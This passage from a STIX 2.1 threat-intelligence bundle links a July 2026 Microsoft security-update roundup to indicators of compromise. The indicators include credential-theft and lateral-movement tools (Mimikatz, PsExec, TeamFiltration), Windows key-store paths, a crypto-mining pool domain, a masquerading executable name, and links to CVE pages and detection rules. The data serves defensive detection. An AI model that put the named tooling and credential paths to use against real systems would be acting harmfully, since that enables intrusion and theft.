      "name": "url: https://any.run/malware-trends/tycoon/",
      "pattern": "[url:value = 'https://any.run/malware-trends/tycoon/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6091124d-c754-56cf-bc09-e65af2e6ffbb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--6a24c719-6a02-5728-9a86-9002074764d6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17154df2-967d-5140-984f-8efef9135aa1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: BAV2ROPC",
      "pattern": "[x-ti-bot:other = 'BAV2ROPC']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7a5a846-62c7-5255-abbf-7a5b71e14739",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--17154df2-967d-5140-984f-8efef9135aa1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7782ed3c-7e51-57aa-b2f3-572675edbbe8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: TeamFiltration",
      "pattern": "[x-ti-bot:other = 'TeamFiltration']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b3e54f50-bb49-5565-9dbe-70445f2bcad1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--7782ed3c-7e51-57aa-b2f3-572675edbbe8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8f755add-efc3-56f7-92c7-78af7255350f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file-path: C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\",
      "pattern": "[x-ti-bot:file-path = 'C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fffa6a55-679c-5a5b-a7a3-7bfb270a7e5b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--8f755add-efc3-56f7-92c7-78af7255350f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--33c04d16-0314-5700-a80e-29ae9473bfbc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file-path: C:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\",
      "pattern": "[x-ti-bot:file-path = 'C:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0cf6e0b0-4e67-506b-b790-0abf0ca2ba10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--33c04d16-0314-5700-a80e-29ae9473bfbc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cbe0b5a5-f00e-515c-bddc-4e579f54d236",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: 10.0.19045.2006",
      "pattern": "[x-ti-bot:string = '10.0.19045.2006']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e435498d-10dc-58e2-87c9-9fc426805813",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--cbe0b5a5-f00e-515c-bddc-4e579f54d236"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--374147e0-977c-569b-9d7c-5e66fcadfef3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: DESKTOP-*",
      "pattern": "[x-ti-bot:string = 'DESKTOP-*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b277e656-23f0-5578-95b9-73db078bcd78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--374147e0-977c-569b-9d7c-5e66fcadfef3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0ca12e6b-b865-5376-92c2-9f5e1338e358",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: Dsreg/10.0 (Windows 10.0.19045.2006)",
      "pattern": "[x-ti-bot:string = 'Dsreg/10.0 (Windows 10.0.19045.2006)']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32929de8-00cd-54f7-bb3f-80d5850a6e8e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--0ca12e6b-b865-5376-92c2-9f5e1338e358"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--580a5ec7-69ae-55c0-857d-8f2d847a950e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: axios/*",
      "pattern": "[x-ti-bot:string = 'axios/*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d341ca67-f691-5778-95b0-a7c388bcefdd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--580a5ec7-69ae-55c0-857d-8f2d847a950e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--265bb5af-a144-55cd-b022-8baa3969cda8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: python-requests/*",
      "pattern": "[x-ti-bot:string = 'python-requests/*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--116e7519-b6f9-5149-bd82-7967ee71886e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--265bb5af-a144-55cd-b022-8baa3969cda8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2aa99d82-57d0-574e-8f18-93213bd94ad1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "pattern: DESKTOP-",
      "pattern": "[x-ti-bot:pattern = 'DESKTOP-']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bbe0e5aa-a044-520d-99af-0cf508d14af3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--2aa99d82-57d0-574e-8f18-93213bd94ad1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ea418a01-cebb-50c4-909f-0c6c1572919b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "os_version: 10.0.19045.2006",
      "pattern": "[x-ti-bot:os_version = '10.0.19045.2006']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac9049d8-83fb-5bf4-ae29-f3135dfd972e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ea418a01-cebb-50c4-909f-0c6c1572919b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--02ef4715-746e-51f9-89a7-b2b3672952b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "user_agent: Dsreg/10.0 (Windows 10.0.19045.2006)",
      "pattern": "[x-ti-bot:user_agent = 'Dsreg/10.0 (Windows 10.0.19045.2006)']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf4c7c46-08d2-5256-bd7f-42a280ba2640",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--02ef4715-746e-51f9-89a7-b2b3672952b1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--43be83ac-7fe0-5342-8f3c-4a76ba287a7e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "user_agent: axios/*",
      "pattern": "[x-ti-bot:user_agent = 'axios/*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--474a8029-3488-5fda-88c7-19a650ca2451",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--43be83ac-7fe0-5342-8f3c-4a76ba287a7e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--39436f94-3003-5847-9cd4-858f869d5cf7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "user_agent: python-requests/*",
      "pattern": "[x-ti-bot:user_agent = 'python-requests/*']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8f599b9-8ceb-55ed-a823-01ada2097cdd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--39436f94-3003-5847-9cd4-858f869d5cf7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--249c5c57-e4a7-58e4-a285-5ceb4a148a98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pool.supportxmr[.]com",
      "pattern": "[domain-name:value = 'pool.supportxmr[.]com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dac142f7-4507-5301-a4d0-aff436577d4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--249c5c57-e4a7-58e4-a285-5ceb4a148a98"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--21dc7797-5f97-5cd6-bb08-3fcf2d547c7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filename: symantec.exe",
      "pattern": "[x-ti-bot:filename = 'symantec.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10ba79d0-f9ba-5160-a1f4-828c94ee2e51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--21dc7797-5f97-5cd6-bb08-3fcf2d547c7a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4909bdd8-c692-50f9-bcab-527ae2e38ab2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "software: PoisonX",
      "pattern": "[x-ti-bot:software = 'PoisonX']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d906d799-1eaf-56ca-8183-00fae5a3f918",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--4909bdd8-c692-50f9-bcab-527ae2e38ab2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--73ef862f-44a0-5005-9994-36a9b72d9f10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "software: AnyDesk",
      "pattern": "[x-ti-bot:software = 'AnyDesk']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bfdd7224-67aa-54ff-a3bb-0e50056ac1b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--73ef862f-44a0-5005-9994-36a9b72d9f10"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6743aaa3-8177-51ea-b1aa-09bc10acbbbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "software: Mimikatz",
      "pattern": "[x-ti-bot:software = 'Mimikatz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--faf00552-ee19-5b3a-a4cb-db8773ce4be3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--6743aaa3-8177-51ea-b1aa-09bc10acbbbd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8ba20348-05eb-570e-8af1-b240cb67b5b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "software: PsExec",
      "pattern": "[x-ti-bot:software = 'PsExec']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b541abbf-c752-5c56-af8b-845756cdb6b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--8ba20348-05eb-570e-8af1-b240cb67b5b0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e92799f6-adc7-54ce-aad3-da3daac01111",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "software: NirSoft tools",
      "pattern": "[x-ti-bot:software = 'NirSoft tools']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--059b197e-714d-5de1-b057-efc853c18929",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--e92799f6-adc7-54ce-aad3-da3daac01111"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ef4d207f-e40a-5b39-8599-c1df39ad3552",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "platform: github.com",
      "pattern": "[x-ti-bot:platform = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09b45042-63e3-5ef5-92b5-92401911db84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ef4d207f-e40a-5b39-8599-c1df39ad3552"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22c7226f-4ebd-5171-abee-15f455bbfcf1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58525",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58525']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d7c4cbe-7595-5853-9394-82603f3b4539",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--22c7226f-4ebd-5171-abee-15f455bbfcf1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--980eca21-ff71-532a-80ab-ca1fd9be4afa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-58525",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-58525']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8b56e66-b97b-58c9-8122-0929050ff206",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--980eca21-ff71-532a-80ab-ca1fd9be4afa"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Microsoft Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Microsoft security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Microsoft's July 2026 security updates.\n",
      "published": "2026-07-03T10:31:01Z",
      "labels": [
        "roundup"
      ],
      "object_refs": [
        "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c",
        "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc",
        "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58",
        "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5",
        "indicator--a1469590-9a8c-544a-9933-d46973047233",
        "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc",
        "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff",
        "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395",
        "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5",
        "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043",
        "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d",
        "indicator--53b08a03-5197-5d35-a9ce-515971533604",
        "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30",
        "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66",
        "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272",
        "indicator--22a47b60-8865-535a-8f14-e915a8128bb1",
        "indicator--35126508-6497-5438-aaa9-833e8c34a868",
        "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4",
        "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43",
        "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290",
        "indicator--94875413-4d87-592e-b755-5bab0a304c12",
        "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e",
        "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3",
        "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405",
        "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6",
        "indicator--541e16ee-1760-56ba-9b79-205269084fc7",
        "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e",
        "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f",
        "indicator--5497f7f2-b232-5434-be81-a4449d780b01",
        "indicator--6470276b-34e1-57ef-a826-742aa376fe5c",
        "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f",
        "indicator--6a24c719-6a02-5728-9a86-9002074764d6",
        "indicator--17154df2-967d-5140-984f-8efef9135aa1",
        "indicator--7782ed3c-7e51-57aa-b2f3-572675edbbe8",
        "indicator--8f755add-efc3-56f7-92c7-78af7255350f",
        "indicator--33c04d16-0314-5700-a80e-29ae9473bfbc",
        "indicator--cbe0b5a5-f00e-515c-bddc-4e579f54d236",
        "indicator--374147e0-977c-569b-9d7c-5e66fcadfef3",
        "indicator--0ca12e6b-b865-5376-92c2-9f5e1338e358",
        "indicator--580a5ec7-69ae-55c0-857d-8f2d847a950e",
        "indicator--265bb5af-a144-55cd-b022-8baa3969cda8",
        "indicator--2aa99d82-57d0-574e-8f18-93213bd94ad1",
        "indicator--ea418a01-cebb-50c4-909f-0c6c1572919b",
        "indicator--02ef4715-746e-51f9-89a7-b2b3672952b1",
        "indicator--43be83ac-7fe0-5342-8f3c-4a76ba287a7e",
        "indicator--39436f94-3003-5847-9cd4-858f869d5cf7",
        "indicator--249c5c57-e4a7-58e4-a285-5ceb4a148a98",
        "indicator--21dc7797-5f97-5cd6-bb08-3fcf2d547c7a",
        "indicator--4909bdd8-c692-50f9-bcab-527ae2e38ab2",
        "indicator--73ef862f-44a0-5005-9994-36a9b72d9f10",
        "indicator--6743aaa3-8177-51ea-b1aa-09bc10acbbbd",
        "indicator--8ba20348-05eb-570e-8af1-b240cb67b5b0",
        "indicator--e92799f6-adc7-54ce-aad3-da3daac01111",
        "indicator--ef4d207f-e40a-5b39-8599-c1df39ad3552",
        "indicator--22c7226f-4ebd-5171-abee-15f455bbfcf1",
        "indicator--980eca21-ff71-532a-80ab-ca1fd9be4afa"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_pinvoke_process_injection_api_chain.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/registry_keys_used_for_persistence.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/executables_or_script_creation_in_temp_path.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_cryptography_namespace.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_process_injection_remote_thread.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_suspicious_process_file_path.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_unsecured_outlook_credentials_access_in_registry.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_system_network_connections_discovery_netsh.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_environment_variable_execution.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_processing_stream_of_data.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_remove_windows_defender_directory.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_windows_defender_exclusion_commands.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_import_applocker_policy.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_logoff_user_via_quser.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_protected_storage_service_access.toml"
        },
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84\u0026utm_source=rss\u0026utm_medium=rss"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_mssql_potential_sql_injection.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_openssh_reverse_port_forwarding.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_aad_graph_unusual_asn.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_amsi_bypass_rpc_ndrclientcall.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/o365/initial_access_teams_rogue_helpdesk_chat.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_quick_assist_fullcontrol_sharing.toml"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57985"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57987"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57988"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57992"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57993"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58282"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58283"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58522"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57977"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57986"
        },
